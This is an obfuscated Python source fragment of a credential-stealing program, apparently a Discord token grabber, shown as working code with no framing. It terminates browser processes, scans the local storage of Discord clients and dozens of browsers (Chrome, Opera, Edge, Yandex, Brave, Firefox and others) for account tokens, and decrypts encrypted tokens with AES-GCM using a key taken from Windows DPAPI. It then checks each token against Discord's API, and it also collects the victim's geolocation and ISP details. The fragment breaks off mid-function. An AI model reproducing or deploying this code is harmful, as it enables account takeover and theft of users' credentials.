    IFILGCZUAECFOAJIWQSMLDHLASMOGXCRIRTZOAXJJNVOVNQDJCSMSUCZDYFJSABPRBCTHLNA = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('zip', "None")
    CETGLDYEKVRWEMQFMBOICKQWWCBOPNRSVSVWIGHUXAYOAANWBOGZPEPAVWGOQTHIBGNBTRTTEYWDMSJ = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('city', "None")
    RIYFEORHQUISIUKCCZVKZDEXMPFDKRTZKLGLNAAVRLAEATLEDDRKPDLJQMDNRQKYJHVZAVQKNGHEOVIBYMBMTCJIO = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('lat', "None")
    HJAPUMGWQUXVUQEBRZBVAFFTCMOENFTXLILKIBNOYEBMNRYDEBHHTKFWBJXPJMIDBKRRBVSJTHPHQNMPKEXACGLHYVUF = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('lon', "None")
    CRCHZDLOHXGWPNKZQCLROURGJFMBCVMKUPDKJZTVIRIBFSHZAYPMYTOALJHH = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('timezone', "None")
    MEJTYVXQSSAXKJWCAYPGLGLMWVQDAGQNABBYZRHNHVNLMAYJYDDNUJIFKNQTYEJ = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('isp', "None")
    JHRHAPOQGDWFKKKVXRQXBELLRFELAKQAJWFOCQWONGGPZLVNBVPZLMOCNRLHSHKQOMXQPHSDLKIRVRRQNTKIFJKXDJIWR = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('org', "None")
    IBVBCOCFEBNZROATIVEXRBIPNAUNHRLOOSIQCKEDHZPTEQQDKCSHQOJLHAUUBXUVACIUBTLVACWTXJNJGEFNMTDRAP = BDSQMJEPXABJZAAXYONLLMBHLDDBJRWOUMOJHWBQSUKYAVSLPIJVNTM.get('as', "None")

def AXYIGABCUKOEWXFZZCKFYUNKPUTNVVDULYLJZHFKNYESIWRPQRQKMZOPPCHTUUKSXEUEW(TOWWUXFUPEZYQBJVRVHUNEIYEUUTQNMFVEXHNXMFIKPWVHDSMVRVTWYCWNZYFQZDEUQAIIMUNWJGUUYVOMA):
    import os
    import re
    import json
    import base64
    import requests
    import psutil
    from Cryptodome.Cipher import AES
    from win32crypt import CryptUnprotectData

    RBRPTAVLSHLUFIBFSPLOVZUOVNFBKLYEFRATLWGYOCMFHEDVMFXKITCHKIICKAYOQZYLPRKWNIJCHPVEXML = ""
    BVZLLRJCYLIHINCCWHKRMRIKRZAOGFKHTVCUSICVIYBCDSBZUJRQXMERFRWBNNPNYL = 0

    def QSLVHYEZQBPWUJSGMLPUHAXOOXLSMBMBQWOKANTMJDUZLFNFFFXKMBMCAMDZQBJUASWWLWJHVJBHQOXNVPISVQCXKIDJVLGEV():  
        JELTNKXBTYNWRFPCBMEOYAGCYTJIGEDCHPYNQRYQMVSNLLFMJHPUKCPDGLVAXXZJGEQAFDVACOPJK = "https://discord.com/api/v9/users/@me"
        QNPNWXWGAZKJGIUKLMMQPBWYJMCSGNWWPEAANPMDZPYQBRHXCDRNCMDIQKWJDOKO = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
        QNPNWXWGAZKJGIUKLMMQPBWYJMCSGNWWPEAANPMDZPYQBRHXCDRNCMDIQKWJDOKO_enc = r"dQw4w9WgXcQ:[^\"]*"
        DUTWDYNZWKZZAJVDGVDOTYRWVWPEITFQRFUYVMOQXDBEXKTHWPTBFJHSBBHXOLDOPPGATUFAIMB = []
        DDBWGMQCGDGAOCROEOSIMNTAZJHQNKIULMSKOFBJKOQVYJXKANOFKARODCVKSA = []
        BHXILDUCMELODPWDCNDHUFWKZSSIDTOGVOUYWJQKUNDKQXTIDKEHHVAAIPVFJE = {}

        ZZVWBLYENSGGCBGWCWEMAIQDBQETWBHAGMETLVBHDIQGLKAFYCXUIJKGEKYFZGRYQJGZIELXEBVJDFK = [
            ("Discord",                os.path.join(PNUVPKSVJQKNIOFLOMKZPLDMTEZWFRCTKCDMDNRKSORCIMLVQJUJKWXWGG, "discord", "Local Storage", "leveldb"),                                                  ""),
            ("Discord Canary",         os.path.join(PNUVPKSVJQKNIOFLOMKZPLDMTEZWFRCTKCDMDNRKSORCIMLVQJUJKWXWGG, "discordcanary", "Local Storage", "leveldb"),                                            ""),
            ("Lightcord",              os.path.join(PNUVPKSVJQKNIOFLOMKZPLDMTEZWFRCTKCDMDNRKSORCIMLVQJUJKWXWGG, "Lightcord", "Local Storage", "leveldb"),                                                ""),
            ("Discord PTB",            os.path.join(PNUVPKSVJQKNIOFLOMKZPLDMTEZWFRCTKCDMDNRKSORCIMLVQJUJKWXWGG, "discordptb", "Local Storage", "leveldb"),                                               ""),
            ("Opera",                  os.path.join(PNUVPKSVJQKNIOFLOMKZPLDMTEZWFRCTKCDMDNRKSORCIMLVQJUJKWXWGG, "Opera Software", "Opera Stable", "Local Storage", "leveldb"),                           "opera.exe"),
            ("Opera GX",               os.path.join(PNUVPKSVJQKNIOFLOMKZPLDMTEZWFRCTKCDMDNRKSORCIMLVQJUJKWXWGG, "Opera Software", "Opera GX Stable", "Local Storage", "leveldb"),                        "opera.exe"),
            ("Opera Neon",             os.path.join(PNUVPKSVJQKNIOFLOMKZPLDMTEZWFRCTKCDMDNRKSORCIMLVQJUJKWXWGG, "Opera Software", "Opera Neon", "Local Storage", "leveldb"),                             "opera.exe"),
            ("Amigo",                  os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Amigo", "User Data", "Local Storage", "leveldb"),                                       "amigo.exe"),
            ("Torch",                  os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Torch", "User Data", "Local Storage", "leveldb"),                                       "torch.exe"),
            ("Kometa",                 os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Kometa", "User Data", "Local Storage", "leveldb"),                                      "kometa.exe"),
            ("Orbitum",                os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Orbitum", "User Data", "Local Storage", "leveldb"),                                     "orbitum.exe"),
            ("CentBrowser",            os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "CentBrowser", "User Data", "Local Storage", "leveldb"),                                 "centbrowser.exe"),
            ("7Star",                  os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "7Star", "7Star", "User Data", "Local Storage", "leveldb"),                              "7star.exe"),
            ("Sputnik",                os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Sputnik", "Sputnik", "User Data", "Local Storage", "leveldb"),                          "sputnik.exe"),
            ("Vivaldi",                os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Vivaldi", "User Data", "Default", "Local Storage", "leveldb"),                          "vivaldi.exe"),
            ("Google Chrome",          os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Google", "Chrome", "User Data", "Default", "Local Storage", "leveldb"),                 "chrome.exe"),
            ("Google Chrome",          os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Google", "Chrome", "User Data", "Profile 1", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome",          os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Google", "Chrome", "User Data", "Profile 2", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome",          os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Google", "Chrome", "User Data", "Profile 3", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome",          os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Google", "Chrome", "User Data", "Profile 4", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome",          os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Google", "Chrome", "User Data", "Profile 5", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome SxS",      os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Google", "Chrome SxS", "User Data", "Default", "Local Storage", "leveldb"),             "chrome.exe"),
            ("Google Chrome Beta",     os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Google", "Chrome Beta", "User Data", "Default", "Local Storage", "leveldb"),            "chrome.exe"),
            ("Google Chrome Dev",      os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Google", "Chrome Dev", "User Data", "Default", "Local Storage", "leveldb"),             "chrome.exe"),
            ("Google Chrome Unstable", os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Google", "Chrome Unstable", "User Data", "Default", "Local Storage", "leveldb"),        "chrome.exe"),
            ("Google Chrome Canary",   os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Google", "Chrome Canary", "User Data", "Default", "Local Storage", "leveldb"),          "chrome.exe"),
            ("Epic Privacy Browser",   os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Epic Privacy Browser", "User Data", "Local Storage", "leveldb"),                        "epic.exe"),
            ("Microsoft Edge",         os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Microsoft", "Edge", "User Data", "Default", "Local Storage", "leveldb"),                "msedge.exe"),
            ("Uran",                   os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "uCozMedia", "Uran", "User Data", "Default", "Local Storage", "leveldb"),                "uran.exe"),
            ("Yandex",                 os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Yandex", "YandexBrowser", "User Data", "Default", "Local Storage", "leveldb"),          "yandex.exe"),
            ("Yandex Canary",          os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Yandex", "YandexBrowserCanary", "User Data", "Default", "Local Storage", "leveldb"),    "yandex.exe"),
            ("Yandex Developer",       os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Yandex", "YandexBrowserDeveloper", "User Data", "Default", "Local Storage", "leveldb"), "yandex.exe"),
            ("Yandex Beta",            os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Yandex", "YandexBrowserBeta", "User Data", "Default", "Local Storage", "leveldb"),      "yandex.exe"),
            ("Yandex Tech",            os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Yandex", "YandexBrowserTech", "User Data", "Default", "Local Storage", "leveldb"),      "yandex.exe"),
            ("Yandex SxS",             os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Yandex", "YandexBrowserSxS", "User Data", "Default", "Local Storage", "leveldb"),       "yandex.exe"),
            ("Brave",                  os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "BraveSoftware", "Brave-Browser", "User Data", "Default", "Local Storage", "leveldb"),   "brave.exe"),
            ("Iridium",                os.path.join(CSFSMPFQHTRISJAYAEQEGDVXTOEBBIOZOKMQGKCNFXKFQUUPUCNJXVIHDLPMBQVNHTTGMHHXDOIBGBXF,   "Iridium", "User Data", "Default", "Local Storage", "leveldb"),                          "iridium.exe"),
        ]

        
        try:
             for ZRXZTTRAOIUKGOFYNCSQXITLIQPMULHCHKNUVPNPELARFEKXRAAMFQNBUKLWSCGHV, DRDWHTRELYVSHBCGBIGUKJUDNVJDPDWERCEBVEFVUXYMCQSNSPONSEBOWF, v4r_proc_name in ZZVWBLYENSGGCBGWCWEMAIQDBQETWBHAGMETLVBHDIQGLKAFYCXUIJKGEKYFZGRYQJGZIELXEBVJDFK:
                for v4r_proc in psutil.process_iter(['pid', 'name']):
                    try:
                        if v4r_proc.name().lower() == v4r_proc_name.lower():
                            v4r_proc.terminate()
                    except: pass
        except: pass

        for ZRXZTTRAOIUKGOFYNCSQXITLIQPMULHCHKNUVPNPELARFEKXRAAMFQNBUKLWSCGHV, DRDWHTRELYVSHBCGBIGUKJUDNVJDPDWERCEBVEFVUXYMCQSNSPONSEBOWF, v4r_proc_name in ZZVWBLYENSGGCBGWCWEMAIQDBQETWBHAGMETLVBHDIQGLKAFYCXUIJKGEKYFZGRYQJGZIELXEBVJDFK:
            if not os.path.exists(DRDWHTRELYVSHBCGBIGUKJUDNVJDPDWERCEBVEFVUXYMCQSNSPONSEBOWF):

                continue
            VJKMFDSCWIFOIUIRRGDEPFTUMNGPKUZWLIZPJCXQPHBXDAMHEPGOBIYHIIYKJCCWIVFATINFNYSMTTPREDJ = ZRXZTTRAOIUKGOFYNCSQXITLIQPMULHCHKNUVPNPELARFEKXRAAMFQNBUKLWSCGHV.replace(" ", "").lower()
            if "cord" in DRDWHTRELYVSHBCGBIGUKJUDNVJDPDWERCEBVEFVUXYMCQSNSPONSEBOWF:
                if not os.path.exists(os.path.join(PNUVPKSVJQKNIOFLOMKZPLDMTEZWFRCTKCDMDNRKSORCIMLVQJUJKWXWGG, VJKMFDSCWIFOIUIRRGDEPFTUMNGPKUZWLIZPJCXQPHBXDAMHEPGOBIYHIIYKJCCWIVFATINFNYSMTTPREDJ, 'Local State')):
                    continue
                for v4r_file_name in os.listdir(DRDWHTRELYVSHBCGBIGUKJUDNVJDPDWERCEBVEFVUXYMCQSNSPONSEBOWF):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    ODIBTQVBTRIZFPAEYGWSZDNQSWDCKLKBRRZJFEZUYMBTAREYAZ = os.path.join(DRDWHTRELYVSHBCGBIGUKJUDNVJDPDWERCEBVEFVUXYMCQSNSPONSEBOWF, v4r_file_name)
                    if os.path.exists(ODIBTQVBTRIZFPAEYGWSZDNQSWDCKLKBRRZJFEZUYMBTAREYAZ):
                        with open(ODIBTQVBTRIZFPAEYGWSZDNQSWDCKLKBRRZJFEZUYMBTAREYAZ, errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for y in re.findall(QNPNWXWGAZKJGIUKLMMQPBWYJMCSGNWWPEAANPMDZPYQBRHXCDRNCMDIQKWJDOKO_enc, v4r_line.strip()):
                                    VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW = MSPMXSESNNXOMAXAQMHQWNTXQTPESNPAUQPOOFIBUPNZZCPFGKIUTJYIDCZQKGBWMSDVNKUAHGANYJLCREJVVal(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), HMDVBRLIUXBPIOXIEUTDDWKAPMPWAJXJUVTEYABBMKLLCZEEDPJVVDHGDMYJWDUHPQJKPJJLELESGOGBYXPRDUTVZZCNX(os.path.join(PNUVPKSVJQKNIOFLOMKZPLDMTEZWFRCTKCDMDNRKSORCIMLVQJUJKWXWGG, VJKMFDSCWIFOIUIRRGDEPFTUMNGPKUZWLIZPJCXQPHBXDAMHEPGOBIYHIIYKJCCWIVFATINFNYSMTTPREDJ, 'Local State')))
                                    if AQEJEXFXNGAJTKVWGWNFUMMGAEJAROCFCGNJQLDCAWJYRPDCKXGYCYKQHMDCZQABFOJWTDPUGJJYAYU(VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW, JELTNKXBTYNWRFPCBMEOYAGCYTJIGEDCHPYNQRYQMVSNLLFMJHPUKCPDGLVAXXZJGEQAFDVACOPJK):
                                        XNJKZVHCCRYKRJJQVXEYFSBOSPZKPWIHKLCBNDWBFHRYDJKWFTCFBJBTDDGHPHNITBFHMQLYWQVARUZGRKRQJFOYZRQMAGZW = requests.get(JELTNKXBTYNWRFPCBMEOYAGCYTJIGEDCHPYNQRYQMVSNLLFMJHPUKCPDGLVAXXZJGEQAFDVACOPJK, headers={'Authorization': VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW}).json()['id']
                                        if XNJKZVHCCRYKRJJQVXEYFSBOSPZKPWIHKLCBNDWBFHRYDJKWFTCFBJBTDDGHPHNITBFHMQLYWQVARUZGRKRQJFOYZRQMAGZW not in DDBWGMQCGDGAOCROEOSIMNTAZJHQNKIULMSKOFBJKOQVYJXKANOFKARODCVKSA:
                                            DUTWDYNZWKZZAJVDGVDOTYRWVWPEITFQRFUYVMOQXDBEXKTHWPTBFJHSBBHXOLDOPPGATUFAIMB.append(VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW)
                                            DDBWGMQCGDGAOCROEOSIMNTAZJHQNKIULMSKOFBJKOQVYJXKANOFKARODCVKSA.append(XNJKZVHCCRYKRJJQVXEYFSBOSPZKPWIHKLCBNDWBFHRYDJKWFTCFBJBTDDGHPHNITBFHMQLYWQVARUZGRKRQJFOYZRQMAGZW)
                                            BHXILDUCMELODPWDCNDHUFWKZSSIDTOGVOUYWJQKUNDKQXTIDKEHHVAAIPVFJE[VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW] = (ZRXZTTRAOIUKGOFYNCSQXITLIQPMULHCHKNUVPNPELARFEKXRAAMFQNBUKLWSCGHV, ODIBTQVBTRIZFPAEYGWSZDNQSWDCKLKBRRZJFEZUYMBTAREYAZ)
            else:
                for v4r_file_name in os.listdir(DRDWHTRELYVSHBCGBIGUKJUDNVJDPDWERCEBVEFVUXYMCQSNSPONSEBOWF):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    ODIBTQVBTRIZFPAEYGWSZDNQSWDCKLKBRRZJFEZUYMBTAREYAZ = os.path.join(DRDWHTRELYVSHBCGBIGUKJUDNVJDPDWERCEBVEFVUXYMCQSNSPONSEBOWF, v4r_file_name)
                    if os.path.exists(ODIBTQVBTRIZFPAEYGWSZDNQSWDCKLKBRRZJFEZUYMBTAREYAZ):
                        with open(ODIBTQVBTRIZFPAEYGWSZDNQSWDCKLKBRRZJFEZUYMBTAREYAZ, errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW in re.findall(QNPNWXWGAZKJGIUKLMMQPBWYJMCSGNWWPEAANPMDZPYQBRHXCDRNCMDIQKWJDOKO, v4r_line.strip()):
                                    if AQEJEXFXNGAJTKVWGWNFUMMGAEJAROCFCGNJQLDCAWJYRPDCKXGYCYKQHMDCZQABFOJWTDPUGJJYAYU(VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW, JELTNKXBTYNWRFPCBMEOYAGCYTJIGEDCHPYNQRYQMVSNLLFMJHPUKCPDGLVAXXZJGEQAFDVACOPJK):
                                        XNJKZVHCCRYKRJJQVXEYFSBOSPZKPWIHKLCBNDWBFHRYDJKWFTCFBJBTDDGHPHNITBFHMQLYWQVARUZGRKRQJFOYZRQMAGZW = requests.get(JELTNKXBTYNWRFPCBMEOYAGCYTJIGEDCHPYNQRYQMVSNLLFMJHPUKCPDGLVAXXZJGEQAFDVACOPJK, headers={'Authorization': VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW}).json()['id']
                                        if XNJKZVHCCRYKRJJQVXEYFSBOSPZKPWIHKLCBNDWBFHRYDJKWFTCFBJBTDDGHPHNITBFHMQLYWQVARUZGRKRQJFOYZRQMAGZW not in DDBWGMQCGDGAOCROEOSIMNTAZJHQNKIULMSKOFBJKOQVYJXKANOFKARODCVKSA:
                                            DUTWDYNZWKZZAJVDGVDOTYRWVWPEITFQRFUYVMOQXDBEXKTHWPTBFJHSBBHXOLDOPPGATUFAIMB.append(VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW)
                                            DDBWGMQCGDGAOCROEOSIMNTAZJHQNKIULMSKOFBJKOQVYJXKANOFKARODCVKSA.append(XNJKZVHCCRYKRJJQVXEYFSBOSPZKPWIHKLCBNDWBFHRYDJKWFTCFBJBTDDGHPHNITBFHMQLYWQVARUZGRKRQJFOYZRQMAGZW)
                                            BHXILDUCMELODPWDCNDHUFWKZSSIDTOGVOUYWJQKUNDKQXTIDKEHHVAAIPVFJE[VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW] = (ZRXZTTRAOIUKGOFYNCSQXITLIQPMULHCHKNUVPNPELARFEKXRAAMFQNBUKLWSCGHV, ODIBTQVBTRIZFPAEYGWSZDNQSWDCKLKBRRZJFEZUYMBTAREYAZ)

        if os.path.exists(os.path.join(PNUVPKSVJQKNIOFLOMKZPLDMTEZWFRCTKCDMDNRKSORCIMLVQJUJKWXWGG, "Mozilla", "Firefox", "Profiles")):
            for DRDWHTRELYVSHBCGBIGUKJUDNVJDPDWERCEBVEFVUXYMCQSNSPONSEBOWF, _, v4r_files in os.walk(os.path.join(PNUVPKSVJQKNIOFLOMKZPLDMTEZWFRCTKCDMDNRKSORCIMLVQJUJKWXWGG, "Mozilla", "Firefox", "Profiles")):
                for v4r__file in v4r_files:
                    if v4r__file.endswith('.sqlite'):
                        with open(os.path.join(DRDWHTRELYVSHBCGBIGUKJUDNVJDPDWERCEBVEFVUXYMCQSNSPONSEBOWF, v4r__file), errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW in re.findall(QNPNWXWGAZKJGIUKLMMQPBWYJMCSGNWWPEAANPMDZPYQBRHXCDRNCMDIQKWJDOKO, v4r_line.strip()):
                                    if AQEJEXFXNGAJTKVWGWNFUMMGAEJAROCFCGNJQLDCAWJYRPDCKXGYCYKQHMDCZQABFOJWTDPUGJJYAYU(VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW, JELTNKXBTYNWRFPCBMEOYAGCYTJIGEDCHPYNQRYQMVSNLLFMJHPUKCPDGLVAXXZJGEQAFDVACOPJK):
                                        XNJKZVHCCRYKRJJQVXEYFSBOSPZKPWIHKLCBNDWBFHRYDJKWFTCFBJBTDDGHPHNITBFHMQLYWQVARUZGRKRQJFOYZRQMAGZW = requests.get(JELTNKXBTYNWRFPCBMEOYAGCYTJIGEDCHPYNQRYQMVSNLLFMJHPUKCPDGLVAXXZJGEQAFDVACOPJK, headers={'Authorization': VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW}).json()['id']
                                        if XNJKZVHCCRYKRJJQVXEYFSBOSPZKPWIHKLCBNDWBFHRYDJKWFTCFBJBTDDGHPHNITBFHMQLYWQVARUZGRKRQJFOYZRQMAGZW not in DDBWGMQCGDGAOCROEOSIMNTAZJHQNKIULMSKOFBJKOQVYJXKANOFKARODCVKSA:
                                            DUTWDYNZWKZZAJVDGVDOTYRWVWPEITFQRFUYVMOQXDBEXKTHWPTBFJHSBBHXOLDOPPGATUFAIMB.append(VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW)
                                            DDBWGMQCGDGAOCROEOSIMNTAZJHQNKIULMSKOFBJKOQVYJXKANOFKARODCVKSA.append(XNJKZVHCCRYKRJJQVXEYFSBOSPZKPWIHKLCBNDWBFHRYDJKWFTCFBJBTDDGHPHNITBFHMQLYWQVARUZGRKRQJFOYZRQMAGZW)
                                            BHXILDUCMELODPWDCNDHUFWKZSSIDTOGVOUYWJQKUNDKQXTIDKEHHVAAIPVFJE[VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW] = ('Firefox', os.path.join(DRDWHTRELYVSHBCGBIGUKJUDNVJDPDWERCEBVEFVUXYMCQSNSPONSEBOWF, v4r__file))
        return DUTWDYNZWKZZAJVDGVDOTYRWVWPEITFQRFUYVMOQXDBEXKTHWPTBFJHSBBHXOLDOPPGATUFAIMB, BHXILDUCMELODPWDCNDHUFWKZSSIDTOGVOUYWJQKUNDKQXTIDKEHHVAAIPVFJE

    def AQEJEXFXNGAJTKVWGWNFUMMGAEJAROCFCGNJQLDCAWJYRPDCKXGYCYKQHMDCZQABFOJWTDPUGJJYAYU(VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW, JELTNKXBTYNWRFPCBMEOYAGCYTJIGEDCHPYNQRYQMVSNLLFMJHPUKCPDGLVAXXZJGEQAFDVACOPJK):
        return requests.get(JELTNKXBTYNWRFPCBMEOYAGCYTJIGEDCHPYNQRYQMVSNLLFMJHPUKCPDGLVAXXZJGEQAFDVACOPJK, headers={'Authorization': VUSJWLZXVHDWLBDNJWWIQRNQLXNCSOLXMFCRUEWTZCIFUATZFIPROYIEPWCMBFBBMW}).status_code == 200

    def MSPMXSESNNXOMAXAQMHQWNTXQTPESNPAUQPOOFIBUPNZZCPFGKIUTJYIDCZQKGBWMSDVNKUAHGANYJLCREJVVal(USQPXRAWKGWNJJGUGKAQIJCROGDSRABKRIZVUUKJZMKBGYHSKJQJJDNMDP, VTXVIEICEQCKHOFQLMTTXGZXOTVPMSSKBSRZZXQBUAVXTFQTHZVPFCDVJDXQR):
        FMYNMBDGMVLTUXYLWWZRVNWJAMANQFVZEXDUYLFNYVJNDXQJWKZGOPDKRGWXHDASGVYOHIDJNMFOGVLJRTJE = USQPXRAWKGWNJJGUGKAQIJCROGDSRABKRIZVUUKJZMKBGYHSKJQJJDNMDP[3:15]
        IJOIPLSGTZPBKWIBZEQNCFPCALIYFHNSBTIFIBBRWKSAREDRVQJTHIBQSQUCJCO = USQPXRAWKGWNJJGUGKAQIJCROGDSRABKRIZVUUKJZMKBGYHSKJQJJDNMDP[15:]
        HOQSOVZFERKWZEBPJLVLKQIRHZZOLJCDNYCYGLLMKPNDRVEGXMHPEFJBUQIACXCDHBGAHFDDMNFNZDURUBVCRPWAQVVLUOZ = AES.new(VTXVIEICEQCKHOFQLMTTXGZXOTVPMSSKBSRZZXQBUAVXTFQTHZVPFCDVJDXQR, AES.MODE_GCM, FMYNMBDGMVLTUXYLWWZRVNWJAMANQFVZEXDUYLFNYVJNDXQJWKZGOPDKRGWXHDASGVYOHIDJNMFOGVLJRTJE)
